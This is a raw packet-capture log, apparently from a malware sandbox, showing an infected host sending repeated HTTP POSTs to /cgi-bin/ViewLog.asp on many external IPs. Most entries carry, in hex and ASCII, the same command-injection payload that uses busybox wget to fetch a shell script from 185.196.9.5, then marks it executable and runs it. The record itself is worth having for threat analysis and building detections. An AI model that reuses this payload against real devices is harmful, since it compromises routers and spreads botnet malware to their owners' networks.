Feb 25, 2024 19:04:02.423455000 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 25 Feb 2024 18:04:01 GMT Server: lighttpd/1.4.33 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
620	192.168.2.15	45282	62.210.244.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.562515974 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:02.743048906 CET	306	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sun, 25 Feb 2024 18:04:02 GMT Content-Type: text/html Content-Length: 146 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
621	192.168.2.15	39368	31.136.149.165	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.562577963 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:05.605721951 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:11.749603033 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:23.781394005 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:48.613277912 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:37.764844894 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
622	192.168.2.15	35222	94.121.114.54	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.598099947 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
623	192.168.2.15	40934	94.122.220.222	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.598196983 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
624	192.168.2.15	59312	31.200.89.89	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.598341942 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
625	192.168.2.15	42164	94.122.117.56	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.599204063 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
626	192.168.2.15	53790	94.121.197.137	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.599322081 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
627	192.168.2.15	44744	31.44.137.208	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.602859020 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
628	192.168.2.15	35218	95.86.82.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.604058981 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
629	192.168.2.15	56656	94.122.119.2	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.607927084 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
630	192.168.2.15	33696	94.30.124.192	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.748920918 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
631	192.168.2.15	46682	31.136.104.235	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.749027014 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:03.333786964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:04.485681057 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:06.885637045 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:11.493660927 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:20.709533930 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:40.421230078 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:17.285010099 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
632	192.168.2.15	60556	31.136.240.211	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:02.755780935 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:03.365679979 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:04.549618959 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:06.885620117 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:11.749588966 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:21.221575022 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:40.421227932 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:19.333122015 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
633	192.168.2.15	60450	31.200.63.243	8080

Timestamp	Bytes transferred	Direction	Data
